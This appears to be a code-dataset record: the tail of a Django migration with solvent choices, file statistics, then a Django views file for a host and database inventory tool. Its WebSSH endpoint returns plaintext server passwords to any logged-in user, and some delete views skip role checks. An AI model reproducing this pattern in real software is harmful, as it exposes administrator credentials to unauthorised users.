oct-1-ene'), ('2-sulfanylethanol', '146. 2-sulfanylethanol'), ('3-methylthiolane 1,1-dioxide', '147. 3-methylthiolane 1,1-dioxide'), ('hexanedinitrile', '148. hexanedinitrile'), ('benzyl acetate', '149. benzyl acetate'), ('cyclohexylcyclohexane', '150. cyclohexylcyclohexane'), ('butanenitrile', '151. butanenitrile'), ('cis-1,2-dichloroethene', '152. cis-1,2-dichloroethene'), ('cis-decaline', '153. cis-decaline'), ('cyclohexanol', '154. cyclohexanol'), ('cyclohexylbenzene', '155. cyclohexylbenzene'), ('cyclopentanone', '156. cyclopentanone'), ('deuterated water', '157. deuterated water'), ('bis(2-ethylhexyl) hexanedioate', '158. bis(2-ethylhexyl) hexanedioate'), ('2,2-dichloroacetic acid', '159. 2,2-dichloroacetic acid'), ('diethyl benzene-1,2-dicarboxylate', '160. diethyl benzene-1,2-dicarboxylate'), ('2-(2-hydroxyethoxy)ethanol', '161. 
2-(2-hydroxyethoxy)ethanol'), ('1-ethoxy-2-(2-ethoxyethoxy)ethane', '162. 1-ethoxy-2-(2-ethoxyethoxy)ethane'), ('1-methoxy-2-(2-methoxyethoxy)ethane', '163. 1-methoxy-2-(2-methoxyethoxy)ethane'), ('diiodomethane', '164. diiodomethane'), ('dibutyl benzene-1,2-dicarboxylate', '165. dibutyl benzene-1,2-dicarboxylate'), ('dinonyl benzene-1,2-dicarboxylate', '166. dinonyl benzene-1,2-dicarboxylate'), ('bis(2-ethylhexyl) phthalate', '167. bis(2-ethylhexyl) phthalate'), ('3-(3-hydroxypropoxy)propan-1-ol', '168. 3-(3-hydroxypropoxy)propan-1-ol'), ('ethane-1,2-diol', '169. ethane-1,2-diol'), ('furan-2-carbaldehyde', '170. furan-2-carbaldehyde'), ('furan-2-ylmethanol', '171. furan-2-ylmethanol'), ('oxolan-2-one', '172. oxolan-2-one'), ('1H-indene', '173. 1H-indene'), ('2-aminoethanol', '174. 2-aminoethanol'), ('1-ethylpyrrolidin-2-one', '175. 1-ethylpyrrolidin-2-one'), ('tetradecane', '176. tetradecane'), ('tridecane', '177. tridecane'), ('octamethylcyclotetrasiloxane', '178. octamethylcyclotetrasiloxane'), ('perflexane', '179. perflexane'), ('perfluorooctane', '180. perfluorooctane'), ('2-phenylacetonitrile', '181. 2-phenylacetonitrile'), ('propanenitrile', '182. propanenitrile'), ('4-methyl-1,3-dioxolan-2-one', '183. 4-methyl-1,3-dioxolan-2-one'), ('quinoline', '184. quinoline'), ('2-chlorobutane', '185. 2-chlorobutane'), ('squalane', '186. squalane'), ('tetraethylene glycol', '187. tetraethylene glycol'), ('tetraglyme', '188. tetraglyme'), ('thiodiglycol', '189. thiodiglycol'), ('trans-1,2-dichloroethene', '190. trans-1,2-dichloroethene'), ('trans-decalin', '191. trans-decalin'), ('N,N-dipentylpentan-1-amine', '192. N,N-dipentylpentan-1-amine'), ('tricaprylin', '193. tricaprylin'), ('triethyl phosphate', '194. triethyl phosphate'), ('triethylene glycol', '195. triethylene glycol'), ('triglyme', '196. triglyme'), ('N,N-dibutylbutan-1-amine', '197. N,N-dibutylbutan-1-amine'), ('N,N-dioctyloctan-1-amine', '198. N,N-dioctyloctan-1-amine'), ('hexamethylphosphoramide', '199. hexamethylphosphoramide'), ('dimethyl carbonate', '200. dimethyl carbonate'), ('diethyl carbonate', '201. diethyl carbonate')], max_length=200, verbose_name='Solvent (Optional)'),
),
migrations.AlterField(
model_name='solventselection',
name='solvent_temp',
field=models.CharField(blank=True, choices=[('water', '1. water: ~298 K - 647.09 K'), ('benzene', '3. benzene: ~298 K - 562.01 K'), ('cyclohexane', '4. cyclohexane: ~298 K - 553.59 K'), ('octane', '6. octane: ~298 K - 569.31 K'), ('decane', '10. decane: ~298 K - 617.69 K'), ('dodecane', '14. dodecane: ~298 K - 658.09 K'), ('ethanol', '15. ethanol: ~298 K - 514.70 K'), ('heptane', '16. heptane: ~298 K - 540.12 K'), ('hexane', '18. hexane: ~298 K - 507.81 K'), ('nonane', '20. nonane: ~298 K - 594.54 K'), ('pentane', '21. pentane: ~298 K - 469.69 K'), ('toluene', '22. toluene: ~298 K - 591.74 K'), ('undecane', '23. undecane: ~298 K - 638.79 K'), ('methanol', '26. methanol: ~298 K - 512.49 K'), ('1,2-dichloroethane', '51. 1,2-dichloroethane: ~298 K - 561.59 K'), ('ethoxyethane', '52. ethoxyethane: ~298 K - 466.69 K'), ('ethylbenzene', '56. ethylbenzene: ~298 K - 617.11 K'), ('1,4-xylene', '87. 1,4-xylene: ~298 K - 616.16 K'), ('propan-2-one', '91. propan-2-one: ~298 K - 508.09 K'), ('1,3-xylene', '129. 1,3-xylene: ~298 K - 616.88 K'), ('1,2-xylene', '130. 1,2-xylene: ~298 K - 630.25 K'), ('octamethylcyclotetrasiloxane', '178. octamethylcyclotetrasiloxane: ~298 K - 586.49 K'), ('dimethyl carbonate', '200. dimethyl carbonate: ~298 K - 556.99 K')], max_length=200, verbose_name='Solvent'),
),
]
| 372.730159
| 9,268
| 0.660378
| 2,993
| 23,482
| 5.146676
| 0.174741
| 0.00831
| 0.01558
| 0.003116
| 0.926058
| 0.918657
| 0.906063
| 0.889055
| 0.883472
| 0.880096
| 0
| 0.095267
| 0.100162
| 23,482
| 62
| 9,269
| 378.741935
| 0.633649
| 0.001916
| 0
| 0.571429
| 1
| 0
| 0.693407
| 0.159036
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017857
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4dbab05ea921fa1c20955195624eb525f072b458
| 89,953
|
py
|
Python
|
OPMS_v3-dev3.1/apps/host_management/views.py
|
litiian/asyncstudy
|
a59119f189ca96fdd7f64b0b3212207572165dce
|
[
"Apache-2.0"
] | null | null | null |
OPMS_v3-dev3.1/apps/host_management/views.py
|
litiian/asyncstudy
|
a59119f189ca96fdd7f64b0b3212207572165dce
|
[
"Apache-2.0"
] | null | null | null |
OPMS_v3-dev3.1/apps/host_management/views.py
|
litiian/asyncstudy
|
a59119f189ca96fdd7f64b0b3212207572165dce
|
[
"Apache-2.0"
] | null | null | null |
######################################
# Django modules
######################################
from django.shortcuts import render, HttpResponseRedirect, redirect, reverse
from django.views import View
from django.http import HttpResponse
from django.db.models import Q
from django.urls import reverse
######################################
# Third-party modules
######################################
from pure_pagination import PageNotAnInteger, Paginator, EmptyPage
######################################
# Standard-library modules
######################################
import json
import datetime
######################################
# In-house modules
######################################
from utils.login_check import LoginStatusCheck
from .forms import *
from .models import *
from operation_record.models import UserOperationRecord
from opms.settings import WEBSSH_IP, WEBSSH_PORT
##############################################################################
# Host asset module
##############################################################################
######################################
# Host list
######################################
class HostListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'host'
web_chose_middle = ''
# Operating systems
systems = OperatingSystemInfo.objects.filter(status=1)
# Projects
projects = ProjectInfo.objects.filter(status=1)
# IDCs (data centers)
idcs = IdcInfo.objects.filter(status=1)
# Environments
envs = OperatingEnvironmentInfo.objects.filter(status=1)
# Uses
uses = UseInfo.objects.filter(status=1)
# Users
users = UserProfile.objects.filter(status=1)
# Fetch host records
host_records = HostInfo.objects.filter(status=1).order_by('-update_time')
# Filter conditions
project = int(request.GET.get('project', '0'))
if project != 0:
host_records = host_records.filter(project_id=project)
idc = int(request.GET.get('idc', '0'))
if idc != 0:
host_records = host_records.filter(idc_id=idc)
env = int(request.GET.get('env', '0'))
if env != 0:
host_records = host_records.filter(op_env_id=env)
use = int(request.GET.get('use', '0'))
if use != 0:
host_records = host_records.filter(use_id=use)
# Keyword
keyword = request.GET.get('keyword', '')
if keyword != '':
host_records = host_records.filter(Q(hostname__icontains=keyword) | Q(
use__name__icontains=keyword) | Q(project__name__icontains=keyword) | Q(desc__icontains=keyword))
# Number of records
record_nums = host_records.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the retrieved data; remember to define the page size
p = Paginator(host_records, 16, request=request)
# QuerySet after pagination
host_records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'systems': systems,
'projects': projects,
'idcs': idcs,
'envs': envs,
'uses': uses,
'users': users,
'project': project,
'idc': idc,
'env': env,
'use': use,
'keyword': keyword,
'host_records': host_records,
'record_nums': record_nums,
'WEBSSH_IP': WEBSSH_IP,
'WEBSSH_PORT': WEBSSH_PORT,
}
return render(request, 'host_management/host/host_list.html', context=context)
else:
return HttpResponse(status=403)
########################################################################################################################
## WebSSH host view
########################################################################################################################
class WebSSHView(LoginStatusCheck, View):
def post(self, request, host_id):
host = HostInfo.objects.get(id=int(host_id))
ret = {}
try:
if host.out_ip:
ip = host.out_ip
else:
ip = host.in_ip
port = host.ssh_port
if host.normal_user:
username = host.normal_user
password = host.normal_pass
else:
username = host.admin_user
password = host.admin_pass
ret = {"ip": ip, 'port': port, "username": username, 'password': password, "static": True}
except Exception as e:
ret['status'] = False
ret['error'] = 'Request error: {}'.format(e)
finally:
return HttpResponse(json.dumps(ret))
######################################
# Add host
######################################
class AddHostInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_host_info_form = AddHostInfoForm(request.POST)
if add_host_info_form.is_valid():
in_ip = request.POST.get('in_ip')
if HostInfo.objects.filter(in_ip=in_ip).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该 IP 的主机已经存在,请检查!"}',
content_type='application/json')
host = HostInfo()
host.in_ip = request.POST.get('in_ip')
host.out_ip = request.POST.get('out_ip', '')
host.system_id = int(request.POST.get('system'))
host.hostname = request.POST.get('hostname')
host.cpu = request.POST.get('cpu')
host.disk = int(request.POST.get('disk'))
host.memory = int(request.POST.get('memory'))
host.network = int(request.POST.get('network'))
host.ssh_port = int(request.POST.get('ssh_port'))
host.root_ssh = request.POST.get('root_ssh')
host.op_env_id = int(request.POST.get('op_env'))
host.use_id = int(request.POST.get('use'))
host.project_id = int(request.POST.get('project'))
host.idc_id = int(request.POST.get('idc'))
host.admin_user = request.POST.get('admin_user')
host.admin_pass = request.POST.get('admin_pass')
host.normal_user = request.POST.get('normal_user', '')
host.normal_pass = request.POST.get('normal_pass', '')
host.op_user_id = int(request.POST.get('op_user'))
host.update_user = request.user
host.desc = request.POST.get('desc', '')
host.save()
# Add an operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = host.id
op_record.operation = 1
op_record.action = "添加 [ %s ] 机房主机:%s" % (host.idc.name, host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"主机信息添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"主机信息填写错误,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Host details
######################################
class HostInfoView(LoginStatusCheck, View):
def get(self, request, host_id):
# Page selection
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'host'
web_chose_middle = ''
# Operating systems
systems = OperatingSystemInfo.objects.filter(status=1)
# Projects
projects = ProjectInfo.objects.filter(status=1)
# IDCs (data centers)
idcs = IdcInfo.objects.filter(status=1)
# Environments
envs = OperatingEnvironmentInfo.objects.filter(status=1)
# Uses
uses = UseInfo.objects.filter(status=1)
# Users
users = UserProfile.objects.filter(status=1)
# Host info
records = HostInfo.objects.get(id=host_id)
# Services
services = HostServiceInfo.objects.filter(host_id=host_id).filter(status=1)
# Check whether a database has been added on this host
is_install_db = DatabaseInfo.objects.filter(host_id=int(host_id)).filter(status=1)
if is_install_db:
for each in is_install_db:
have_db_id = each.id
else:
have_db_id = ''
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'systems': systems,
'projects': projects,
'idcs': idcs,
'envs': envs,
'uses': uses,
'users': users,
'services': services,
'have_db_id': have_db_id,
}
return render(request, 'host_management/host/host_info.html', context=context)
######################################
# Delete host
######################################
class DeleteHostView(LoginStatusCheck, View):
def post(self, request):
try:
host_id = request.POST.get('host_id')
host = HostInfo.objects.get(id=int(host_id))
host.update_user = request.user
host.status = 0
host.save()
# Add an operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = host.id
op_record.operation = 4
op_record.action = "停用 [ %s ] 机房主机:%s" % (host.idc.name, host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"主机删除成功!"}', content_type='application/json')
except Exception as e:
return HttpResponse('{"status":"falied", "msg":"主机删除失败!"}', content_type='application/json')
######################################
# Edit host
######################################
class EditHostInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_host_info_form = EditHostInfoForm(request.POST)
if edit_host_info_form.is_valid():
# Fetch the host being edited
host_id = int(request.POST.get('host_id'))
host = HostInfo.objects.get(id=host_id)
host.in_ip = request.POST.get('in_ip')
host.out_ip = request.POST.get('out_ip', '')
host.system_id = int(request.POST.get('system'))
host.hostname = request.POST.get('hostname')
host.cpu = request.POST.get('cpu')
host.disk = int(request.POST.get('disk'))
host.memory = int(request.POST.get('memory'))
host.network = int(request.POST.get('network'))
host.ssh_port = int(request.POST.get('ssh_port'))
host.root_ssh = request.POST.get('root_ssh')
host.op_env_id = int(request.POST.get('op_env'))
host.use_id = int(request.POST.get('use'))
host.project_id = int(request.POST.get('project'))
host.idc_id = int(request.POST.get('idc'))
host.admin_user = request.POST.get('admin_user')
host.admin_pass = request.POST.get('admin_pass')
host.normal_user = request.POST.get('normal_user', '')
host.normal_pass = request.POST.get('normal_pass', '')
host.op_user_id = int(request.POST.get('op_user'))
host.update_user = request.user
host.desc = request.POST.get('desc', '')
host.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = host.id
op_record.operation = 2
op_record.action = "Edited host in IDC [ %s ]: %s" % (host.idc.name, host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Host updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid host data, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Database list
######################################
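# The list views below share one pattern: filter active rows, apply optional
# GET filters and keyword search, count, then paginate. Paginator taking a
# request= kwarg suggests django-pure-pagination rather than Django's
# built-in paginator (an assumption based on the call signature).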
class DatabaseListView(LoginStatusCheck, View):
def get(self, request):
# Page selection
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'database'
web_chose_middle = ''
# Hosts
hosts = HostInfo.objects.filter(status=1)
# IDCs
idcs = IdcInfo.objects.filter(status=1)
# Environments
envs = OperatingEnvironmentInfo.objects.filter(status=1)
# Users
users = UserProfile.objects.filter(status=1)
# Database records
db_records = DatabaseInfo.objects.filter(status=1).order_by('-update_time')
# Filter conditions
idc = int(request.GET.get('idc', '0'))
if idc != 0:
db_records = db_records.filter(host__idc_id=idc)
env = int(request.GET.get('env', '0'))
if env != 0:
db_records = db_records.filter(host__op_env_id=env)
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
db_records = db_records.filter(Q(host__in_ip=keyword))
# Record count
record_nums = db_records.count()
# Validate the page number
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# Paginate the results; remember to set the page size
p = Paginator(db_records, 16, request=request)
# The paginated QuerySet
db_records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'hosts': hosts,
'idcs': idcs,
'envs': envs,
'idc': idc,
'env': env,
'users': users,
'keyword': keyword,
'record_nums': record_nums,
'db_records': db_records,
}
return render(request, 'host_management/host/db_list.html', context=context)
######################################
# Database detail
######################################
class DatabaseInfoView(LoginStatusCheck, View):
def get(self, request, db_id):
# Page selection
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'database'
web_chose_middle = ''
# Basic database record
db_records = DatabaseInfo.objects.get(id=int(db_id))
# Schemas on this database server
db_db_records = DatabaseDBInfo.objects.filter(db_id=int(db_id)).filter(status=1).order_by('-update_time')
# Database users
db_user_records = DatabaseUserInfo.objects.filter(db_id=int(db_id)).filter(status=1).order_by('-update_time')
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'db_records': db_records,
'db_db_records': db_db_records,
'db_user_records': db_user_records,
}
return render(request, 'host_management/host/db_info.html', context=context)
######################################
# Add database record
######################################
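# At most one active DatabaseInfo record is allowed per host: the view
# rejects the request when an active (status=1) record for host_id exists.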
class AddDatabaseInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
if DatabaseInfo.objects.filter(host_id=int(request.POST.get('host_id'))).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该主机的记录已经存在,请检查!"}', content_type='application/json')
add_db_info_form = AddDatabaseInfoForm(request.POST)
if add_db_info_form.is_valid():
db_info = DatabaseInfo()
db_info.host_id = int(request.POST.get('host_id'))
db_info.db_name = request.POST.get('db_name')
db_info.db_version = request.POST.get('db_version')
db_info.db_admin_user = request.POST.get('db_admin_user')
db_info.db_admin_pass = request.POST.get('db_admin_pass')
db_info.desc = request.POST.get('desc', '')
db_info.add_user = request.user
db_info.update_user = request.user
db_info.status = 1
db_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 1
op_record.action = "Added database record: %s" % (db_info.host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit database record
######################################
class EditDatabaseInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_db_info_form = EditDatabaseInfoForm(request.POST)
if edit_db_info_form.is_valid():
db_info = DatabaseInfo.objects.get(id=int(request.POST.get('db_id')))
# Check for a duplicate record
db_host = int(request.POST.get('host_id'))
if db_info.host_id != db_host:
if DatabaseInfo.objects.filter(host_id=db_host).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"A record for this host already exists, please check!"}',
content_type='application/json')
# No duplicate, proceed with the update
db_info.host_id = db_host
db_info.db_name = request.POST.get('db_name')
db_info.db_version = request.POST.get('db_version')
db_info.db_admin_user = request.POST.get('db_admin_user')
db_info.db_admin_pass = request.POST.get('db_admin_pass')
db_info.desc = request.POST.get('desc', '')
db_info.update_user = request.user
db_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 2
op_record.action = "Edited database record: %s" % (db_info.host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete database record
######################################
class DeleteDatabaseInfoView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
db_info = DatabaseInfo.objects.get(id=int(request.POST.get('db_id')))
db_info.status = 0
db_info.update_user = request.user
db_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 4
op_record.action = "Disabled database record: %s" % (db_info.host.in_ip)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Add database (schema)
######################################
class AddDatabaseDBView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
if DatabaseDBInfo.objects.filter(db_id=int(request.POST.get('db_id'))).filter(
name=request.POST.get('name')).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
add_db_form = AddDatabaseDBForm(request.POST)
if add_db_form.is_valid():
db_info = DatabaseDBInfo()
db_info.db_id = int(request.POST.get('db_id'))
db_info.name = request.POST.get('name')
db_info.use = request.POST.get('use')
db_info.desc = request.POST.get('desc', '')
db_info.add_user = request.user
db_info.update_user = request.user
db_info.status = 1
db_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 1
op_record.action = "Added database on host [ %s ]: %s" % (db_info.db.host.in_ip, db_info.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit database (schema)
######################################
class EditDatabaseDBView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
db_info = DatabaseDBInfo.objects.get(id=int(request.POST.get('db_id')))
# Check whether the record already exists
if db_info.name != request.POST.get('name'):
if DatabaseDBInfo.objects.filter(db_id=int(request.POST.get('db_db_id'))).filter(
name=request.POST.get('name')).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"This record already exists, please check!"}', content_type='application/json')
edit_db_form = EditDatabaseDBForm(request.POST)
if edit_db_form.is_valid():
db_info.db_id = int(request.POST.get('db_db_id'))
db_info.name = request.POST.get('name')
db_info.use = request.POST.get('use')
db_info.desc = request.POST.get('desc', '')
db_info.update_user = request.user
db_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 2
op_record.action = "Edited database on host [ %s ]: %s" % (db_info.db.host.in_ip, db_info.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete database (schema)
######################################
class DeleteDatabaseDBView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
db_info = DatabaseDBInfo.objects.get(id=int(request.POST.get('db_id')))
db_info.update_user = request.user
db_info.status = 0
db_info.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_info.id
op_record.operation = 4
op_record.action = "Deleted database on host [ %s ]: %s" % (db_info.db.host.in_ip, db_info.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Add database user
######################################
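# grant_db is a many-to-many relation, so the user row is saved first to get
# a primary key and the granted schemas are then attached with .add(). Note
# the duplicate-username check here does not filter on status=1, unlike the
# edit view below, so it also matches disabled users.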
class AddDatabaseUserView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
# Check the user
db_user = DatabaseUserInfo.objects.filter(db_id=int(request.POST.get('db_id'))).filter(
username=request.POST.get('username'))
if db_user:
return HttpResponse('{"status":"failed", "msg":"This user already exists, please check!"}', content_type='application/json')
add_db_user_form = AddDatabaseUserForm(request.POST)
if add_db_user_form.is_valid():
db_user = DatabaseUserInfo()
db_user.db_id = int(request.POST.get('db_id'))
db_user.username = request.POST.get('username')
db_user.password = request.POST.get('password')
db_user.grant_login = request.POST.get('grant_login')
db_user.desc = request.POST.get('desc', '')
db_user.add_user = request.user
db_user.update_user = request.user
db_user.status = 1
db_user.save()
for each in request.POST.getlist('dbs'):
db = DatabaseDBInfo.objects.get(id=int(each))
db_user.grant_db.add(db)
db_user.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_user.id
op_record.operation = 1
op_record.action = "Added database user on host [ %s ]: %s" % (db_user.db.host.in_ip, db_user.username)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit database user
######################################
class EditDatabaseUserView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
# Check the user
db_user = DatabaseUserInfo.objects.get(id=int(request.POST.get('db_user_id')))
new_username = request.POST.get('username')
if db_user.username != new_username:
if DatabaseUserInfo.objects.filter(username=new_username).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该用户已存在,请检查!"}', content_type='application/json')
edit_db_user_form = EditDatabaseUserForm(request.POST)
if edit_db_user_form.is_valid():
db_user.username = request.POST.get('username')
db_user.password = request.POST.get('password')
db_user.grant_login = request.POST.get('grant_login')
db_user.desc = request.POST.get('desc', '')
db_user.update_user = request.user
db_user.grant_db.clear()
db_user.save()
for each in request.POST.getlist('dbs'):
db = DatabaseDBInfo.objects.get(id=int(each))
db_user.grant_db.add(db)
db_user.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_user.id
op_record.operation = 2
op_record.action = "Edited database user on host [ %s ]: %s" % (db_user.db.host.in_ip, db_user.username)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid input, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete database user
######################################
class DeleteDatabaseUserView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
# Check the user
db_user = DatabaseUserInfo.objects.get(id=int(request.POST.get('db_user_id')))
db_user.status = 0
db_user.update_user = request.user
db_user.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_user.id
op_record.operation = 4
op_record.action = "Disabled database user on host [ %s ]: %s" % (db_user.db.host.in_ip, db_user.username)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Deleted successfully!"}', content_type='application/json')
else:
return HttpResponse(status=403)
##############################################################################
# Basic configuration module
##############################################################################
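# The CRUD views in this module follow one template: check for an active
# duplicate, save the row, then write a UserOperationRecord audit entry.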
######################################
# Add host service
######################################
class AddHostServiceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_service_form = AddHostServiceForm(request.POST)
if add_service_form.is_valid():
service = HostServiceInfo()
host = int(request.POST.get('host_id'))
service.host_id = host
service.name = request.POST.get('name')
service.version = request.POST.get('version')
service.listen_user = request.POST.get('listen_user')
service.listen_port = request.POST.get('listen_port')
service.ins_path = request.POST.get('ins_path')
service.log_path = request.POST.get('log_path')
service.backup_path = request.POST.get('backup_path', '')
service.start_cmd = request.POST.get('start_cmd')
service.desc = request.POST.get('desc', '')
service.add_user = request.user
service.update_user = request.user
service.status = 1
service.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = service.id
op_record.operation = 1
op_record.action = "Added service on host [ %s ]: %s" % (service.host.in_ip, service.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Host service added successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid host service data, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Edit host service
######################################
class EditHostServiceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_service_form = EditHostServiceForm(request.POST)
if edit_service_form.is_valid():
service = HostServiceInfo.objects.get(id=int(request.POST.get('ser_id')))
service.name = request.POST.get('name')
service.version = request.POST.get('version')
service.listen_user = request.POST.get('listen_user')
service.listen_port = request.POST.get('listen_port')
service.ins_path = request.POST.get('ins_path')
service.log_path = request.POST.get('log_path')
service.backup_path = request.POST.get('backup_path', '')
service.start_cmd = request.POST.get('start_cmd')
service.desc = request.POST.get('desc', '')
service.update_user = request.user
service.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = service.id
op_record.operation = 2
op_record.action = "Edited service on host [ %s ]: %s" % (service.host.in_ip, service.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Host service updated successfully!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"Invalid host service data, please check!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# Delete service
######################################
class DeleteHostServiceView(LoginStatusCheck, View):
def post(self, request):
try:
ser_id = request.POST.get('ser_id')
service = HostServiceInfo.objects.get(id=int(ser_id))
service.update_user = request.user
service.status = 0
service.save()
# Add operation record
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = service.id
op_record.operation = 4
op_record.action = "Disabled service on host [ %s ]: %s" % (service.host.in_ip, service.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"Service deleted successfully!"}', content_type='application/json')
except Exception as e:
return HttpResponse('{"status":"failed", "msg":"Failed to delete service!"}', content_type='application/json')
######################################
# Operating systems
######################################
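# The keyword filter searches name/version/desc and, through the related
# UserProfile rows, the Chinese display name of the adding/updating user.
# The local variable `os` used below shadows the standard-library module of
# the same name if it is imported elsewhere in this file.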
class OSListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# Page selection
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'os'
web_chose_middle = ''
# Fetch operating systems
systems = OperatingSystemInfo.objects.filter(status=1).order_by('-update_time')
# Keyword search
keyword = request.GET.get('keyword', '')
if keyword != '':
systems = systems.filter(
